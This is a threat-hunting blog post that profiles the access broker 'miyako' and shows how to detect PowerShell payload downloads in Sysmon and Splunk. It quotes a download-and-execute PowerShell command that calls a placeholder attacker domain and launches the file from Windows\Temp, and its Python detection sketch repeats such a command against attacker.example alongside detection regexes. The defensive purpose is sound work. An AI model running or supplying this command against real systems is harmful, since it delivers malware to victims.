Initial access brokers (IABs) are underground threat actors who sell access to compromised networks or systems. Because obtaining access can be time-consuming, this has emerged as its own cybercriminal product category and is sometimes referred to as “access-as-a-service.” Access could mean stolen login credentials or knowledge of a software exploit or misconfiguration. Threat actors sometimes post screenshots of, say, domain controllers to prove the access. Buying the access essentially saves other malicious hackers time and allows them to move on to downstream actions, such as stealing data, deploying malware or conducting extortion attacks using ransomware.
One prolific IAB goes by the nicknames miyako, miya and Mommy, among others. The actor gained attention in 2024 due to miyako’s advanced tactics, techniques and procedures (TTPs) and involvement in high-profile attacks. The actor claims to work alone, focusing on data exfiltration and exploiting high-value targets, particularly government entities, telecommunications companies and critical infrastructure providers. The person was an active and notorious member of the BreachForums cybercrime forum (see our blog “BreachForums Saga Continues: What’s Next?”) and conducted several significant attacks as a member of the HellCat hacking group.
In January 2025, miyako created an intrusion manual that used real scenarios to explain how the actor compromised multiple entities. The guide was offered for sale on BreachForums, but a copy of it was uploaded to VirusTotal. The guide allows aspiring access brokers and cybercriminals to replicate miyako’s methods and gives them tutorials along with tools and commands to accomplish the same attacks. It outlines detailed methodologies for conducting intrusions, maintaining persistence, setting up command-and-control (C2) servers, expanding initial footholds and monetizing compromised access and data. This includes how to leverage publicly available proof-of-concept (PoC) exploit code for known common vulnerabilities and exposures (CVEs) and scanning internet-exposed systems using search tools like Shodan, FOFA and Leakix. It covers exploitation of several vulnerabilities in network edge enterprise products, such as firewalls. It also provides suggestions of how to market and sell the access to systems and data, such as: “If someone keeps asking for proof of multiple accesses and then never buys over and over, stop providing proof. Don't tell someone how you got in, they will go try and do it themself.”
In this threat hunting case study, we will demonstrate a technique used by miyako as well as other threat groups to download malicious payloads using Microsoft’s PowerShell scripting language.
The most effective threat hunts focus on detecting the TTPs attackers consistently use. Indicators of compromise (IoCs), such as IP addresses and malware hashes, should be scanned for as part of due diligence, but the absence of such indicators doesn’t mean a system is clean. Attackers are often creatures of habit, relying on the same behaviors and workflows in their intrusions, and hunting for these behaviors can be a more reliable sign of a possible intrusion. TTPs sit at the top of the Pyramid of Pain, a model that ranks indicator types by how difficult they are for threat actors to change.
Threat actors often favor using native Windows binaries once they’ve breached a system. These tools — referred to as living-off-the-land binaries (LOLBins) — are already present on the compromised systems, so their use is less likely to raise security alarms. Common Windows LOLBins include certutil, mshta, bitsadmin, PowerShell and regsvr32. Use of these tools is not by itself a reliable indicator, but how they are used may provide clues leading to evidence of compromise. The actor miyako, for example, previously abused PowerShell to download a malicious payload from an external domain. If we perform a threat hunt, we may be able to uncover artifacts showing this.
We’re going to select a specific hunt package from HUNTER, Intel 471’s threat hunting platform, called Methods for Downloading Files with PowerShell. The package is available in HUNTER’s Community Platform upon registration. HUNTER contains prewritten hunt queries for this hunt for various endpoint detection and response (EDR) and security information and event management (SIEM) systems: CarbonBlack Cloud - Investigate, CarbonBlack Response, Crowdstrike LogScale, Elastic, Google SecOps, Microsoft Defender, Microsoft Sentinel, Palo Alto Cortex XDR, QRadar Query, SentinelOne, SentinelOne Singularity, Splunk, Tanium, Tanium Signal and Trend Micro Vision One.
This package is intended to identify instances where PowerShell is being used to download files from external sources, which is a common technique used in malware delivery and lateral movement. The hunt examines various methods by which PowerShell can be leveraged for file downloads, including the use of cmdlets such as Invoke-WebRequest (iwr), Invoke-RestMethod (irm) and Start-BitsTransfer (sbt), as well as direct use of .NET classes like System.Net.WebClient and HttpClient. The package also checks for potentially suspicious use of aliases (curl, wget) and other common executables that invoke PowerShell scripts to download malicious payloads.
Let’s look at the query logic (see image below). It contains the key-value or field-value relationships that we will be hunting for. The logic includes any command line or executable path that invokes values related to PowerShell or associated with remote downloads.
It should be noted that these processes can be invoked by legitimate users. To disambiguate whether a download action is legitimate or not, we can examine any external domains or IP addresses contacted. Further investigation may determine the activity came from an administrator downloading a legitimate tool. Or maybe not.
In miyako’s malicious hacking guide, we can examine the syntax the actor used to execute a command without invoking an executable file and dropping a payload on the machine:
powershell -ep bypass -Command "Invoke-WebRequest -Uri 'http://{{ATTACKER_DOMAIN}}/maliciouspayload' -OutFile 'C:\Windows\Temp\{{PAYLOAD_NAME}}.exe'; Start-Process 'C:\Windows\Temp\{{PAYLOAD_NAME}}.exe'"
In the command, we can see “Invoke-WebRequest” along with the domain where the attacker has hosted the malicious payload. We can also see the destination for the payload, which is Windows’ temporary directory, a somewhat obscure place that attackers are hoping administrators will not be watching. It’s an easy place to hide until the attackers can take steps to establish more persistent access, such as creating a Scheduled Task.
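As an added illustration (not code from this post or from HUNTER), here is a Python sketch of the package’s query logic run over constructed Sysmon-style process-creation records: it flags the PowerShell download methods listed earlier (iwr, irm, sbt, WebClient, HttpClient, curl/wget aliases) and pulls out the pivots discussed for the command above (remote URL, OutFile path, drop into a temp directory, execution-policy bypass, Start-Process). All hostnames, domains and paths are constructed placeholders.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields); not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"host": "WS01", "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmd": r'''powershell -ep bypass -Command "Invoke-WebRequest -Uri 'http://attacker.example/maliciouspayload' -OutFile 'C:\Windows\Temp\svc.exe'; Start-Process 'C:\Windows\Temp\svc.exe'"'''},
    {"host": "WS02", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": r'''powershell -c "(New-Object System.Net.WebClient).DownloadFile('https://files.example/tool.zip', 'C:\Users\admin\Downloads\tool.zip')"'''},
    {"host": "WS03", "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmd": r'''powershell -Command "Get-ChildItem C:\Windows\Temp"'''},
    {"host": "WS04", "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmd": r'''powershell -c "curl http://203.0.113.5/a.png -o C:\Windows\Temp\a.png"'''},
]

# One regex per PowerShell download method the hunt looks for, matched against the command line.
DOWNLOAD_METHODS = {
    "Invoke-WebRequest": r"\b(?:Invoke-WebRequest|iwr)\b",
    "Invoke-RestMethod": r"\b(?:Invoke-RestMethod|irm)\b",
    "Start-BitsTransfer": r"\b(?:Start-BitsTransfer|sbt)\b",
    "System.Net.WebClient": r"System\.Net\.WebClient|\.Download(?:File|String|Data)\(",
    "HttpClient": r"\bHttpClient\b",
    "curl/wget alias": r"\b(?:curl|wget)\b",
}
PS_RE = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?\b", re.I)   # PowerShell image or launcher
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)                         # remote source contacted
OUTFILE_RE = re.compile(r"(?:-OutFile|-Destination|-o)\s+['\"]?([A-Za-z]:\\[^'\";]+)", re.I)
TEMP_RE = re.compile(r"\\(?:Windows\\Temp|AppData\\Local\\Temp|ProgramData)\\", re.I)

def classify(event):
    """Return a hunt hit for a PowerShell process that downloads a file, else None."""
    cmd = event["cmd"]
    if not (PS_RE.search(event["image"]) or PS_RE.search(cmd)):
        return None
    methods = [name for name, pat in DOWNLOAD_METHODS.items() if re.search(pat, cmd, re.I)]
    if not methods:
        return None
    m = OUTFILE_RE.search(cmd)
    outfile = m.group(1) if m else None
    return {
        "host": event["host"], "parent": event["parent"], "methods": methods,
        "urls": URL_RE.findall(cmd), "outfile": outfile,
        # Pivots for the analyst: temp-directory drop, policy bypass, payload launched.
        "temp_drop": bool(outfile and TEMP_RE.search(outfile)),
        "ep_bypass": bool(re.search(r"-(?:ep|ExecutionPolicy)\s+bypass", cmd, re.I)),
        "starts_payload": bool(re.search(r"\bStart-Process\b|\biex\b|Invoke-Expression", cmd, re.I)),
    }

def hunt(events):
    return [hit for hit in map(classify, events) if hit]
```

Hits still need the disambiguation step described above (who contacted which domain, and whether the file was created), which is why each hit carries the URL and OutFile path rather than a verdict.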
The last part of the command starts the process linked to the payload. This query casts a wide net. Many other threat actors use this command, including several ransomware groups such as Fog, Interlock, Black Basta, Ghost, Amadey and SafePay. Let’s run a query using Windows System Monitor (Sysmon) logs in Splunk:
The result shows the launch of a PowerShell process and parent process. That’s not enough evidence of a compromise just yet, but we can aggregate the data to collect more artifacts to hunt. The results show this behavior was first seen and last seen on this specific host and only run once. The process was powershell.exe and the parent process was PowerShell. Then we can see the command-line arguments, and this is where the hunt becomes very interesting.
The result shows the PowerShell command reached out to a Google domain for a portable network graphic (.png) file. From here, the investigation can be taken in different directions, such as checking network and domain name system (DNS) logs to see if the domain was contacted. Another direction would be to check file-create logs in Windows Event Logs to see if this file actually landed in the directory shown in the script.
Thanks for joining us for another threat hunt. A video demonstrating this hunt technique can be found here. Be sure to register for a free HUNTER Community Edition account to view other free threat hunt content and our extensive library of threat hunt packages based on our Malware Intelligence and Adversary Intelligence. HUNTER also contains a purpose-built centralized hunt management tool, the HUNT Management Module, for tracking and measuring key hunt performance metrics, coordinating collaborative hunts, managing hunt queries and reporting. For more information, contact Intel 471.